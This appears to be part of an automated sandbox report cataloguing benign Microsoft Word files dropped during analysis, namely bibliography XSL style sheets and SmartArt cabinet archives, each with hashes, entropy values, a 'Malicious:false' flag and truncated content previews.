                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):294178
                                                                                      Entropy (8bit):4.977758311135714
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                      MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                      SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                      SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                      SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLouserzed">.. <xsl:choose>.. <xsl:when test="b:StyleNameLouserzed/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLouserzed/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):290
                                                                                      Entropy (8bit):3.5081874837369886
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                                                      SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                                                      SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                                                      SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):255948
                                                                                      Entropy (8bit):5.103631650117028
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                      MD5:9888A214D362470A6189DEFF775BE139
                                                                                      SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                      SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                      SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):292
                                                                                      Entropy (8bit):3.5026803317779778
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:A0D51783BFEE86F3AC46A810404B6796
                                                                                      SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                                                      SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                                                      SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):251032
                                                                                      Entropy (8bit):5.102652100491927
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                      MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                      SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                      SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                      SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288
                                                                                      Entropy (8bit):3.523917709458511
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                                                      SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                                                      SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                                                      SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):296658
                                                                                      Entropy (8bit):5.000002997029767
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                      MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                      SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                      SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                      SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):290
                                                                                      Entropy (8bit):3.5161159456784024
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                                                      SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                                                      SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                                                      SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):344303
                                                                                      Entropy (8bit):5.023195898304535
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                      MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                      SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                      SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                      SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):19893
                                                                                      Entropy (8bit):7.592090622603185
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                      MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                      SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                      SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                      SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                      Malicious:false
                                                                                      Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):20457
                                                                                      Entropy (8bit):7.612540359660869
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                      MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                      SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                      SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                      SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                      Malicious:false
                                                                                      Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):26944
                                                                                      Entropy (8bit):7.7574645319832225
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                      MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                      SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                      SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                      SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                      Malicious:false
                                                                                      Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):31083
                                                                                      Entropy (8bit):7.814202819173796
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                      MD5:89A9818E6658D73A73B642522FF8701F
                                                                                      SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                      SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                      SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                      Malicious:false
                                                                                      Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):21111
                                                                                      Entropy (8bit):7.6297992466897675
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                      MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                      SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                      SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                      SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                      Malicious:false
                                                                                      Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):32833
                                                                                      Entropy (8bit):7.825460303519308
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                                                      MD5:205AF51604EF96EF1E8E60212541F742
                                                                                      SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                                                      SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                                                      SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                                                      Malicious:false
                                                                                      Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):31471
                                                                                      Entropy (8bit):7.818389271364328
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                                                      MD5:91AADBEC4171CFA8292B618492F5EF34
